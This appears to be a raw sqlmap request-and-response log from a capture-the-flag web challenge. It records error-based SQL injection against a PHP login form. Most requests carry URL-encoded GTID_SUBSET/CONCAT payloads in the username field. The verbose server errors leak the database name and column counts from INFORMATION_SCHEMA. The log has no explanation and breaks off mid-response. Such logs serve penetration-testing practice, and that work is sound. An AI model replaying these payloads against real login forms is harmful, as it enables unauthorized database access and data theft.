HTTP request [#1]:
GET /web/1/login.php HTTP/1.1
Cache-control: no-cache
User-agent: sqlmap/1.4.4#stable (http://sqlmap.org)
Host: web.ctf.devclub.in
Accept: */*
Accept-encoding: gzip,deflate
Connection: close

HTTP response [#1] (200 OK):
Date: Sun, 08 May 2022 20:49:28 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 170
Connection: close
Server: nginx/1.20.2
Set-Cookie: PHPSESSID=qbdesicsumbcn8thdlfb3j4qgh; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
URI: https://web.ctf.devclub.in/web/1/login.php


<html>
	<head>
		<title>Login</title>
	</head>
	<body>
		<h1>Login</h1>
		<form method="POST">
			Username: <input type="text" name="username"/>
			<br/>
			Password: <input type="password" name="password"/>
			<input type="submit"/>
		</form>
	</body>
</html>


############################################################################

HTTP request [#2]:
GET /web/1/login.php HTTP/1.1
Cache-control: no-cache
User-agent: sqlmap/1.4.4#stable (http://sqlmap.org)
Cookie: PHPSESSID=qbdesicsumbcn8thdlfb3j4qgh
Host: web.ctf.devclub.in
Accept: */*
Accept-encoding: gzip,deflate
Connection: close

HTTP response [#2] (200 OK):
Date: Sun, 08 May 2022 20:49:30 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 170
Connection: close
Server: nginx/1.20.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
URI: https://web.ctf.devclub.in/web/1/login.php


<html>
	<head>
		<title>Login</title>
	</head>
	<body>
		<h1>Login</h1>
		<form method="POST">
			Username: <input type="text" name="username"/>
			<br/>
			Password: <input type="password" name="password"/>
			<input type="submit"/>
		</form>
	</body>
</html>


############################################################################

HTTP request [#1]:
POST /web/1/login.php HTTP/1.1
Cache-control: no-cache
User-agent: sqlmap/1.4.4#stable (http://sqlmap.org)
Cookie: PHPSESSID=qbdesicsumbcn8thdlfb3j4qgh
Host: web.ctf.devclub.in
Accept: */*
Accept-encoding: gzip,deflate
Content-type: application/x-www-form-urlencoded; charset=utf-8
Content-length: 13
Connection: close

username=Xjhd

HTTP response [#1] (400 Bad Request):
Date: Sun, 08 May 2022 20:49:31 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 1208
Connection: close
Server: nginx/1.20.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
URI: https://web.ctf.devclub.in:443/web/1/login.php

<br />
<font size='1'><table class='xdebug-error xe-warning' dir='ltr' border='1' cellspacing='0' cellpadding='1'>
<tr><th align='left' bgcolor='#f57900' colspan="5"><span style='background-color: #cc0000; color: #fce94f; font-size: x-large;'>( ! )</span> Warning: Undefined array key "password" in /app/login.php on line <i>9</i></th></tr>
<tr><th align='left' bgcolor='#e9b96e' colspan='5'>Call Stack</th></tr>
<tr><th align='center' bgcolor='#eeeeec'>#</th><th align='left' bgcolor='#eeeeec'>Time</th><th align='left' bgcolor='#eeeeec'>Memory</th><th align='left' bgcolor='#eeeeec'>Function</th><th align='left' bgcolor='#eeeeec'>Location</th></tr>
<tr><td bgcolor='#eeeeec' align='center'>1</td><td bgcolor='#eeeeec' align='center'>0.0000</td><td bgcolor='#eeeeec' align='right'>362456</td><td bgcolor='#eeeeec'>{main}(  )</td><td title='/app/login.php' bgcolor='#eeeeec'>.../login.php<b>:</b>0</td></tr>
</table></font>
Incorrect credentials
<html>
	<head>
		<title>Login</title>
	</head>
	<body>
		<h1>Login</h1>
		<form method="POST">
			Username: <input type="text" name="username"/>
			<br/>
			Password: <input type="password" name="password"/>
			<input type="submit"/>
		</form>
	</body>
</html>


############################################################################

HTTP request [#2]:
POST /web/1/login.php HTTP/1.1
Cache-control: no-cache
User-agent: sqlmap/1.4.4#stable (http://sqlmap.org)
Cookie: PHPSESSID=qbdesicsumbcn8thdlfb3j4qgh
Host: web.ctf.devclub.in
Accept: */*
Accept-encoding: gzip,deflate
Content-type: application/x-www-form-urlencoded; charset=utf-8
Content-length: 208
Connection: close

username=Xjhd%27%20AND%20GTID_SUBSET%28CONCAT%280x7162627171%2C%28SELECT%20%28CASE%20WHEN%20%28ISNULL%28JSON_STORAGE_FREE%28NULL%29%29%29%20THEN%201%20ELSE%200%20END%29%29%2C0x716a706b71%29%2C4583%29--%20SDgo

HTTP response [#2] (400 Bad Request):
Date: Sun, 08 May 2022 20:49:32 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 1276
Connection: close
Server: nginx/1.20.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
URI: https://web.ctf.devclub.in:443/web/1/login.php

<br />
<font size='1'><table class='xdebug-error xe-warning' dir='ltr' border='1' cellspacing='0' cellpadding='1'>
<tr><th align='left' bgcolor='#f57900' colspan="5"><span style='background-color: #cc0000; color: #fce94f; font-size: x-large;'>( ! )</span> Warning: Undefined array key "password" in /app/login.php on line <i>9</i></th></tr>
<tr><th align='left' bgcolor='#e9b96e' colspan='5'>Call Stack</th></tr>
<tr><th align='center' bgcolor='#eeeeec'>#</th><th align='left' bgcolor='#eeeeec'>Time</th><th align='left' bgcolor='#eeeeec'>Memory</th><th align='left' bgcolor='#eeeeec'>Function</th><th align='left' bgcolor='#eeeeec'>Location</th></tr>
<tr><td bgcolor='#eeeeec' align='center'>1</td><td bgcolor='#eeeeec' align='center'>0.0000</td><td bgcolor='#eeeeec' align='right'>362984</td><td bgcolor='#eeeeec'>{main}(  )</td><td title='/app/login.php' bgcolor='#eeeeec'>.../login.php<b>:</b>0</td></tr>
</table></font>
Error description: FUNCTION web1_db.JSON_STORAGE_FREE does not existIncorrect credentials
<html>
	<head>
		<title>Login</title>
	</head>
	<body>
		<h1>Login</h1>
		<form method="POST">
			Username: <input type="text" name="username"/>
			<br/>
			Password: <input type="password" name="password"/>
			<input type="submit"/>
		</form>
	</body>
</html>


############################################################################

HTTP request [#3]:
POST /web/1/login.php HTTP/1.1
Cache-control: no-cache
User-agent: sqlmap/1.4.4#stable (http://sqlmap.org)
Cookie: PHPSESSID=qbdesicsumbcn8thdlfb3j4qgh
Host: web.ctf.devclub.in
Accept: */*
Accept-encoding: gzip,deflate
Content-type: application/x-www-form-urlencoded; charset=utf-8
Content-length: 187
Connection: close

username=Xjhd%27%20AND%20GTID_SUBSET%28CONCAT%280x7162627171%2C%28MID%28%28IFNULL%28CAST%28DATABASE%28%29%20AS%20NCHAR%29%2C0x20%29%29%2C1%2C190%29%29%2C0x716a706b71%29%2C1860%29--%20jUJF

HTTP response [#3] (400 Bad Request):
Date: Sun, 08 May 2022 20:49:32 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 1280
Connection: close
Server: nginx/1.20.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
URI: https://web.ctf.devclub.in:443/web/1/login.php

<br />
<font size='1'><table class='xdebug-error xe-warning' dir='ltr' border='1' cellspacing='0' cellpadding='1'>
<tr><th align='left' bgcolor='#f57900' colspan="5"><span style='background-color: #cc0000; color: #fce94f; font-size: x-large;'>( ! )</span> Warning: Undefined array key "password" in /app/login.php on line <i>9</i></th></tr>
<tr><th align='left' bgcolor='#e9b96e' colspan='5'>Call Stack</th></tr>
<tr><th align='center' bgcolor='#eeeeec'>#</th><th align='left' bgcolor='#eeeeec'>Time</th><th align='left' bgcolor='#eeeeec'>Memory</th><th align='left' bgcolor='#eeeeec'>Function</th><th align='left' bgcolor='#eeeeec'>Location</th></tr>
<tr><td bgcolor='#eeeeec' align='center'>1</td><td bgcolor='#eeeeec' align='center'>0.0000</td><td bgcolor='#eeeeec' align='right'>362888</td><td bgcolor='#eeeeec'>{main}(  )</td><td title='/app/login.php' bgcolor='#eeeeec'>.../login.php<b>:</b>0</td></tr>
</table></font>
Error description: Malformed GTID set specification 'qbbqqweb1_dbqjpkq'.Incorrect credentials
<html>
	<head>
		<title>Login</title>
	</head>
	<body>
		<h1>Login</h1>
		<form method="POST">
			Username: <input type="text" name="username"/>
			<br/>
			Password: <input type="password" name="password"/>
			<input type="submit"/>
		</form>
	</body>
</html>


############################################################################

HTTP request [#4]:
POST /web/1/login.php HTTP/1.1
Cache-control: no-cache
User-agent: sqlmap/1.4.4#stable (http://sqlmap.org)
Cookie: PHPSESSID=qbdesicsumbcn8thdlfb3j4qgh
Host: web.ctf.devclub.in
Accept: */*
Accept-encoding: gzip,deflate
Content-type: application/x-www-form-urlencoded; charset=utf-8
Content-length: 301
Connection: close

username=Xjhd%27%20AND%20GTID_SUBSET%28CONCAT%280x7162627171%2C%28SELECT%20IFNULL%28CAST%28COUNT%28%2A%29%20AS%20NCHAR%29%2C0x20%29%20FROM%20INFORMATION_SCHEMA.COLUMNS%20WHERE%20table_name%3D0x4348415241435445525f53455453%20AND%20table_schema%3D0x776562315f6462%29%2C0x716a706b71%29%2C6129%29--%20Tilp

HTTP response [#4] (400 Bad Request):
Date: Sun, 08 May 2022 20:49:32 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 1274
Connection: close
Server: nginx/1.20.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
URI: https://web.ctf.devclub.in:443/web/1/login.php

<br />
<font size='1'><table class='xdebug-error xe-warning' dir='ltr' border='1' cellspacing='0' cellpadding='1'>
<tr><th align='left' bgcolor='#f57900' colspan="5"><span style='background-color: #cc0000; color: #fce94f; font-size: x-large;'>( ! )</span> Warning: Undefined array key "password" in /app/login.php on line <i>9</i></th></tr>
<tr><th align='left' bgcolor='#e9b96e' colspan='5'>Call Stack</th></tr>
<tr><th align='center' bgcolor='#eeeeec'>#</th><th align='left' bgcolor='#eeeeec'>Time</th><th align='left' bgcolor='#eeeeec'>Memory</th><th align='left' bgcolor='#eeeeec'>Function</th><th align='left' bgcolor='#eeeeec'>Location</th></tr>
<tr><td bgcolor='#eeeeec' align='center'>1</td><td bgcolor='#eeeeec' align='center'>0.0000</td><td bgcolor='#eeeeec' align='right'>363208</td><td bgcolor='#eeeeec'>{main}(  )</td><td title='/app/login.php' bgcolor='#eeeeec'>.../login.php<b>:</b>0</td></tr>
</table></font>
Error description: Malformed GTID set specification 'qbbqq0qjpkq'.Incorrect credentials
<html>
	<head>
		<title>Login</title>
	</head>
	<body>
		<h1>Login</h1>
		<form method="POST">
			Username: <input type="text" name="username"/>
			<br/>
			Password: <input type="password" name="password"/>
			<input type="submit"/>
		</form>
	</body>
</html>


############################################################################

HTTP request [#5]:
POST /web/1/login.php HTTP/1.1
Cache-control: no-cache
User-agent: sqlmap/1.4.4#stable (http://sqlmap.org)
Cookie: PHPSESSID=qbdesicsumbcn8thdlfb3j4qgh
Host: web.ctf.devclub.in
Accept: */*
Accept-encoding: gzip,deflate
Content-type: application/x-www-form-urlencoded; charset=utf-8
Content-length: 293
Connection: close

username=Xjhd%27%20AND%20GTID_SUBSET%28CONCAT%280x7162627171%2C%28SELECT%20IFNULL%28CAST%28COUNT%28%2A%29%20AS%20NCHAR%29%2C0x20%29%20FROM%20INFORMATION_SCHEMA.COLUMNS%20WHERE%20table_name%3D0x434f4c4c4154494f4e53%20AND%20table_schema%3D0x776562315f6462%29%2C0x716a706b71%29%2C5158%29--%20HoxJ

HTTP response [#5] (400 Bad Request):
Date: Sun, 08 May 2022 20:49:44 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 1274
Connection: close
Server: nginx/1.20.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
URI: https://web.ctf.devclub.in:443/web/1/login.php

<br />
<font size='1'><table class='xdebug-error xe-warning' dir='ltr' border='1' cellspacing='0' cellpadding='1'>
<tr><th align='left' bgcolor='#f57900' colspan="5"><span style='background-color: #cc0000; color: #fce94f; font-size: x-large;'>( ! )</span> Warning: Undefined array key "password" in /app/login.php on line <i>9</i></th></tr>
<tr><th align='left' bgcolor='#e9b96e' colspan='5'>Call Stack</th></tr>
<tr><th align='center' bgcolor='#eeeeec'>#</th><th align='left' bgcolor='#eeeeec'>Time</th><th align='left' bgcolor='#eeeeec'>Memory</th><th align='left' bgcolor='#eeeeec'>Function</th><th align='left' bgcolor='#eeeeec'>Location</th></tr>
<tr><td bgcolor='#eeeeec' align='center'>1</td><td bgcolor='#eeeeec' align='center'>0.0000</td><td bgcolor='#eeeeec' align='right'>363208</td><td bgcolor='#eeeeec'>{main}(  )</td><td title='/app/login.php' bgcolor='#eeeeec'>.../login.php<b>:</b>0</td></tr>
</table></font>
Error description: Malformed GTID set specification 'qbbqq0qjpkq'.Incorrect credentials
<html>
	<head>
		<title>Login</title>
	</head>
	<body>
		<h1>Login</h1>
		<form method="POST">
			Username: <input type="text" name="username"/>
			<br/>
			Password: <input type="password" name="password"/>
			<input type="submit"/>
		</form>
	</body>
</html>


############################################################################

HTTP request [#6]:
POST /web/1/login.php HTTP/1.1
Cache-control: no-cache
User-agent: sqlmap/1.4.4#stable (http://sqlmap.org)
Cookie: PHPSESSID=qbdesicsumbcn8thdlfb3j4qgh
Host: web.ctf.devclub.in
Accept: */*
Accept-encoding: gzip,deflate
Content-type: application/x-www-form-urlencoded; charset=utf-8
Content-length: 347
Connection: close

username=Xjhd%27%20AND%20GTID_SUBSET%28CONCAT%280x7162627171%2C%28SELECT%20IFNULL%28CAST%28COUNT%28%2A%29%20AS%20NCHAR%29%2C0x20%29%20FROM%20INFORMATION_SCHEMA.COLUMNS%20WHERE%20table_name%3D0x434f4c4c4154494f4e5f4348415241435445525f5345545f4150504c49434142494c495459%20AND%20table_schema%3D0x776562315f6462%29%2C0x716a706b71%29%2C8297%29--%20dJMg

HTTP response [#6] (400 Bad Request):
Date: Sun, 08 May 2022 20:49:46 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 1274
Connection: close
Server: nginx/1.20.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
URI: https://web.ctf.devclub.in:443/web/1/login.php

<br />
<font size='1'><table class='xdebug-error xe-warning' dir='ltr' border='1' cellspacing='0' cellpadding='1'>
<tr><th align='left' bgcolor='#f57900' colspan="5"><span style='background-color: #cc0000; color: #fce94f; font-size: x-large;'>( ! )</span> Warning: Undefined array key "password" in /app/login.php on line <i>9</i></th></tr>
<tr><th align='left' bgcolor='#e9b96e' colspan='5'>Call Stack</th></tr>
<tr><th align='center' bgcolor='#eeeeec'>#</th><th align='left' bgcolor='#eeeeec'>Time</th><th align='left' bgcolor='#eeeeec'>Memory</th><th align='left' bgcolor='#eeeeec'>Function</th><th align='left' bgcolor='#eeeeec'>Location</th></tr>
<tr><td bgcolor='#eeeeec' align='center'>1</td><td bgcolor='#eeeeec' align='center'>0.0000</td><td bgcolor='#eeeeec' align='right'>363400</td><td bgcolor='#eeeeec'>{main}(  )</td><td title='/app/login.php' bgcolor='#eeeeec'>.../login.php<b>:</b>0</td></tr>
</table></font>
Error description: Malformed GTID set specification 'qbbqq0qjpkq'.Incorrect credentials
<html>
	<head>
		<title>Login</title>
	</head>
	<body>
		<h1>Login</h1>
		<form method="POST">
			Username: <input type="text" name="username"/>
			<br/>
			Password: <input type="password" name="password"/>
			<input type="submit"/>
		</form>
	</body>
</html>


############################################################################

HTTP request [#7]:
POST /web/1/login.php HTTP/1.1
Cache-control: no-cache
User-agent: sqlmap/1.4.4#stable (http://sqlmap.org)
Cookie: PHPSESSID=qbdesicsumbcn8thdlfb3j4qgh
Host: web.ctf.devclub.in
Accept: */*
Accept-encoding: gzip,deflate
Content-type: application/x-www-form-urlencoded; charset=utf-8
Content-length: 307
Connection: close

username=Xjhd%27%20AND%20GTID_SUBSET%28CONCAT%280x7162627171%2C%28SELECT%20IFNULL%28CAST%28COUNT%28%2A%29%20AS%20NCHAR%29%2C0x20%29%20FROM%20INFORMATION_SCHEMA.COLUMNS%20WHERE%20table_name%3D0x434f4c554d4e5f50524956494c45474553%20AND%20table_schema%3D0x776562315f6462%29%2C0x716a706b71%29%2C8421%29--%20FPyV

HTTP response [#7] (400 Bad Request):
Date: Sun, 08 May 2022 20:49:46 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 1274
Connection: close
Server: nginx/1.20.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
URI: https://web.ctf.devclub.in:443/web/1/login.php

<br />
<font size='1'><table class='xdebug-error xe-warning' dir='ltr' border='1' cellspacing='0' cellpadding='1'>
<tr><th align='left' bgcolor='#f57900' colspan="5"><span style='background-color: #cc0000; color: #fce94f; font-size: x-large;'>( ! )</span> Warning: Undefined array key "password" in /app/login.php on line <i>9</i></th></tr>
<tr><th align='left' bgcolor='#e9b96e' colspan='5'>Call Stack</th></tr>
<tr><th align='center' bgcolor='#eeeeec'>#</th><th align='left' bgcolor='#eeeeec'>Time</th><th align='left' bgcolor='#eeeeec'>Memory</th><th align='left' bgcolor='#eeeeec'>Function</th><th align='left' bgcolor='#eeeeec'>Location</th></tr>
<tr><td bgcolor='#eeeeec' align='center'>1</td><td bgcolor='#eeeeec' align='center'>0.0000</td><td bgcolor='#eeeeec' align='right'>363336</td><td bgcolor='#eeeeec'>{main}(  )</td><td title='/app/login.php' bgcolor='#eeeeec'>.../login.php<b>:</b>0</td></tr>
</table></font>
Error description: Malformed GTID set specification 'qbbqq0qjpkq'.Incorrect credentials
<html>
	<head>
		<title>Login</title>
	</head>
	<body>
		<h1>Login</h1>
		<form method="POST">
			Username: <input type="text" name="username"/>
			<br/>
			Password: <input type="password" name="password"/>
			<input type="submit"/>
		</form>
	</body>
</html>


############################################################################

HTTP request [#8]:
POST /web/1/login.php HTTP/1.1
Cache-control: no-cache
User-agent: sqlmap/1.4.4#stable (http://sqlmap.org)
Cookie: PHPSESSID=qbdesicsumbcn8thdlfb3j4qgh
Host: web.ctf.devclub.in
Accept: */*
Accept-encoding: gzip,deflate
Content-type: application/x-www-form-urlencoded; charset=utf-8
Content-length: 287
Connection: close

username=Xjhd%27%20AND%20GTID_SUBSET%28CONCAT%280x7162627171%2C%28SELECT%20IFNULL%28CAST%28COUNT%28%2A%29%20AS%20NCHAR%29%2C0x20%29%20FROM%20INFORMATION_SCHEMA.COLUMNS%20WHERE%20table_name%3D0x454e47494e4553%20AND%20table_schema%3D0x776562315f6462%29%2C0x716a706b71%29%2C1480%29--%20mCXZ

HTTP response [#8] (400 Bad Request):
Date: Sun, 08 May 2022 20:49:47 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 1274
Connection: close
Server: nginx/1.20.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
URI: https://web.ctf.devclub.in:443/web/1/login.php

<br />
<font size='1'><table class='xdebug-error xe-warning' dir='ltr' border='1' cellspacing='0' cellpadding='1'>
<tr><th align='left' bgcolor='#f57900' colspan="5"><span style='background-color: #cc0000; color: #fce94f; font-size: x-large;'>( ! )</span> Warning: Undefined array key "password" in /app/login.php on line <i>9</i></th></tr>
<tr><th align='left' bgcolor='#e9b96e' colspan='5'>Call Stack</th></tr>
<tr><th align='center' bgcolor='#eeeeec'>#</th><th align='left' bgcolor='#eeeeec'>Time</th><th align='left' bgcolor='#eeeeec'>Memory</th><th align='left' bgcolor='#eeeeec'>Function</th><th align='left' bgcolor='#eeeeec'>Location</th></tr>
<tr><td bgcolor='#eeeeec' align='center'>1</td><td bgcolor='#eeeeec' align='center'>0.0000</td><td bgcolor='#eeeeec' align='right'>363208</td><td bgcolor='#eeeeec'>{main}(  )</td><td title='/app/login.php' bgcolor='#eeeeec'>.../login.php<b>:</b>0</td></tr>
</table></font>
Error description: Malformed GTID set specification 'qbbqq0qjpkq'.Incorrect credentials
<html>
	<head>
		<title>Login</title>
	</head>
	<body>
		<h1>Login</h1>
		<form method="POST">
			Username: <input type="text" name="username"/>
			<br/>
			Password: <input type="password" name="password"/>
			<input type="submit"/>
		</form>
	</body>
</html>


############################################################################

HTTP request [#9]:
POST /web/1/login.php HTTP/1.1
Cache-control: no-cache
User-agent: sqlmap/1.4.4#stable (http://sqlmap.org)
Cookie: PHPSESSID=qbdesicsumbcn8thdlfb3j4qgh
Host: web.ctf.devclub.in
Accept: */*
Accept-encoding: gzip,deflate
Content-type: application/x-www-form-urlencoded; charset=utf-8
Content-length: 285
Connection: close

username=Xjhd%27%20AND%20GTID_SUBSET%28CONCAT%280x7162627171%2C%28SELECT%20IFNULL%28CAST%28COUNT%28%2A%29%20AS%20NCHAR%29%2C0x20%29%20FROM%20INFORMATION_SCHEMA.COLUMNS%20WHERE%20table_name%3D0x4556454e5453%20AND%20table_schema%3D0x776562315f6462%29%2C0x716a706b71%29%2C6581%29--%20zAYm

HTTP response [#9] (400 Bad Request):
Date: Sun, 08 May 2022 20:49:47 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 1274
Connection: close
Server: nginx/1.20.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
URI: https://web.ctf.devclub.in:443/web/1/login.php

<br />
<font size='1'><table class='xdebug-error xe-warning' dir='ltr' border='1' cellspacing='0' cellpadding='1'>
<tr><th align='left' bgcolor='#f57900' colspan="5"><span style='background-color: #cc0000; color: #fce94f; font-size: x-large;'>( ! )</span> Warning: Undefined array key "password" in /app/login.php on line <i>9</i></th></tr>
<tr><th align='left' bgcolor='#e9b96e' colspan='5'>Call Stack</th></tr>
<tr><th align='center' bgcolor='#eeeeec'>#</th><th align='left' bgcolor='#eeeeec'>Time</th><th align='left' bgcolor='#eeeeec'>Memory</th><th align='left' bgcolor='#eeeeec'>Function</th><th align='left' bgcolor='#eeeeec'>Location</th></tr>
<tr><td bgcolor='#eeeeec' align='center'>1</td><td bgcolor='#eeeeec' align='center'>0.0000</td><td bgcolor='#eeeeec' align='right'>363208</td><td bgcolor='#eeeeec'>{main}(  )</td><td title='/app/login.php' bgcolor='#eeeeec'>.../login.php<b>:</b>0</td></tr>
</table></font>
Error description: Malformed GTID set specification 'qbbqq0qjpkq'.Incorrect credentials
<html>
	<head>
		<title>Login</title>
	</head>
	<body>
		<h1>Login</h1>
		<form method="POST">
			Username: <input type="text" name="username"/>
			<br/>
			Password: <input type="password" name="password"/>
			<input type="submit"/>
		</form>
	</body>
</html>


############################################################################

HTTP request [#10]:
POST /web/1/login.php HTTP/1.1
Cache-control: no-cache
User-agent: sqlmap/1.4.4#stable (http://sqlmap.org)
Cookie: PHPSESSID=qbdesicsumbcn8thdlfb3j4qgh
Host: web.ctf.devclub.in
Accept: */*
Accept-encoding: gzip,deflate
Content-type: application/x-www-form-urlencoded; charset=utf-8
Content-length: 283
Connection: close

username=Xjhd%27%20AND%20GTID_SUBSET%28CONCAT%280x7162627171%2C%28SELECT%20IFNULL%28CAST%28COUNT%28%2A%29%20AS%20NCHAR%29%2C0x20%29%20FROM%20INFORMATION_SCHEMA.COLUMNS%20WHERE%20table_name%3D0x46494c4553%20AND%20table_schema%3D0x776562315f6462%29%2C0x716a706b71%29%2C3887%29--%20XVOG

HTTP response [#10] (400 Bad Request):
Date: Sun, 08 May 2022 20:49:49 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 1274
Connection: close
Server: nginx/1.20.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
URI: https://web.ctf.devclub.in:443/web/1/login.php

<br />
<font size='1'><table class='xdebug-error xe-warning' dir='ltr' border='1' cellspacing='0' cellpadding='1'>
<tr><th align='left' bgcolor='#f57900' colspan="5"><span style='background-color: #cc0000; color: #fce94f; font-size: x-large;'>( ! )</span> Warning: Undefined array key "password" in /app/login.php on line <i>9</i></th></tr>
<tr><th align='left' bgcolor='#e9b96e' colspan='5'>Call Stack</th></tr>
<tr><th align='center' bgcolor='#eeeeec'>#</th><th align='left' bgcolor='#eeeeec'>Time</th><th align='left' bgcolor='#eeeeec'>Memory</th><th align='left' bgcolor='#eeeeec'>Function</th><th align='left' bgcolor='#eeeeec'>Location</th></tr>
<tr><td bgcolor='#eeeeec' align='center'>1</td><td bgcolor='#eeeeec' align='center'>0.0000</td><td bgcolor='#eeeeec' align='right'>363208</td><td bgcolor='#eeeeec'>{main}(  )</td><td title='/app/login.php' bgcolor='#eeeeec'>.../login.php<b>:</b>0</td></tr>
</table></font>
Error description: Malformed GTID set specification 'qbbqq0qjpkq'.Incorrect credentials
<html>
	<head>
		<title>Login</title>
	</head>
	<body>
		<h1>Login</h1>
		<form method="POST">
			Username: <input type="text" name="username"/>
			<br/>
			Password: <input type="password" name="password"/>
			<input type="submit"/>
		</form>
	</body>
</html>


############################################################################

HTTP request [#11]:
POST /web/1/login.php HTTP/1.1
Cache-control: no-cache
User-agent: sqlmap/1.4.4#stable (http://sqlmap.org)
Cookie: PHPSESSID=qbdesicsumbcn8thdlfb3j4qgh
Host: web.ctf.devclub.in
Accept: */*
Accept-encoding: gzip,deflate
Content-type: application/x-www-form-urlencoded; charset=utf-8
Content-length: 299
Connection: close

username=Xjhd%27%20AND%20GTID_SUBSET%28CONCAT%280x7162627171%2C%28SELECT%20IFNULL%28CAST%28COUNT%28%2A%29%20AS%20NCHAR%29%2C0x20%29%20FROM%20INFORMATION_SCHEMA.COLUMNS%20WHERE%20table_name%3D0x474c4f42414c5f535441545553%20AND%20table_schema%3D0x776562315f6462%29%2C0x716a706b71%29%2C2522%29--%20FxLx

HTTP response [#11] (400 Bad Request):
Date: Sun, 08 May 2022 20:49:51 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 1274
Connection: close
Server: nginx/1.20.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
URI: https://web.ctf.devclub.in:443/web/1/login.php

<br />
<font size='1'><table class='xdebug-error xe-warning' dir='ltr' border='1' cellspacing='0' cellpadding='1'>
<tr><th align='left' bgcolor='#f57900' colspan="5"><span style='background-color: #cc0000; color: #fce94f; font-size: x-large;'>( ! )</span> Warning: Undefined array key "password" in /app/login.php on line <i>9</i></th></tr>
<tr><th align='left' bgcolor='#e9b96e' colspan='5'>Call Stack</th></tr>
<tr><th align='center' bgcolor='#eeeeec'>#</th><th align='left' bgcolor='#eeeeec'>Time</th><th align='left' bgcolor='#eeeeec'>Memory</th><th align='left' bgcolor='#eeeeec'>Function</th><th align='left' bgcolor='#eeeeec'>Location</th></tr>
<tr><td bgcolor='#eeeeec' align='center'>1</td><td bgcolor='#eeeeec' align='center'>0.0000</td><td bgcolor='#eeeeec' align='right'>363208</td><td bgcolor='#eeeeec'>{main}(  )</td><td title='/app/login.php' bgcolor='#eeeeec'>.../login.php<b>:</b>0</td></tr>
</table></font>
Error description: Malformed GTID set specification 'qbbqq0qjpkq'.Incorrect credentials
<html>
	<head>
		<title>Login</title>
	</head>
	<body>
		<h1>Login</h1>
		<form method="POST">
			Username: <input type="text" name="username"/>
			<br/>
			Password: <input type="password" name="password"/>
			<input type="submit"/>
		</form>
	</body>
</html>


############################################################################

HTTP request [#12]:
POST /web/1/login.php HTTP/1.1
Cache-control: no-cache
User-agent: sqlmap/1.4.4#stable (http://sqlmap.org)
Cookie: PHPSESSID=qbdesicsumbcn8thdlfb3j4qgh
Host: web.ctf.devclub.in
Accept: */*
Accept-encoding: gzip,deflate
Content-type: application/x-www-form-urlencoded; charset=utf-8
Content-length: 305
Connection: close

username=Xjhd%27%20AND%20GTID_SUBSET%28CONCAT%280x7162627171%2C%28SELECT%20IFNULL%28CAST%28COUNT%28%2A%29%20AS%20NCHAR%29%2C0x20%29%20FROM%20INFORMATION_SCHEMA.COLUMNS%20WHERE%20table_name%3D0x474c4f42414c5f5641524941424c4553%20AND%20table_schema%3D0x776562315f6462%29%2C0x716a706b71%29%2C6180%29--%20ljLZ

HTTP response [#12] (400 Bad Request):
Date: Sun, 08 May 2022 20:49:51 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 1274
Connection: close
Server: nginx/1.20.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
URI: https://web.ctf.devclub.in:443/web/1/login.php

<br />
<font size='1'><table class='xdebug-error xe-warning' dir='ltr' border='1' cellspacing='0' cellpadding='1'>
<tr><th align='left' bgcolor='#f57900' colspan="5"><span style='background-color: #cc0000; color: #fce94f; font-size: x-large;'>( ! )</span> Warning: Undefined array key "password" in /app/login.php on line <i>9</i></th></tr>
<tr><th align='left' bgcolor='#e9b96e' colspan='5'>Call Stack</th></tr>
<tr><th align='center' bgcolor='#eeeeec'>#</th><th align='left' bgcolor='#eeeeec'>Time</th><th align='left' bgcolor='#eeeeec'>Memory</th><th align='left' bgcolor='#eeeeec'>Function</th><th align='left' bgcolor='#eeeeec'>Location</th></tr>
<tr><td bgcolor='#eeeeec' align='center'>1</td><td bgcolor='#eeeeec' align='center'>0.0000</td><td bgcolor='#eeeeec' align='right'>363336</td><td bgcolor='#eeeeec'>{main}(  )</td><td title='/app/login.php' bgcolor='#eeeeec'>.../login.php<b>:</b>0</td></tr>
</table></font>
Error description: Malformed GTID set specification 'qbbqq0qjpkq'.Incorrect credentials
<html>
	<head>
		<title>Login</title>
	</head>
	<body>
		<h1>Login</h1>
		<form method="POST">
			Username: <input type="text" name="username"/>
			<br/>
			Password: <input type="password" name="password"/>
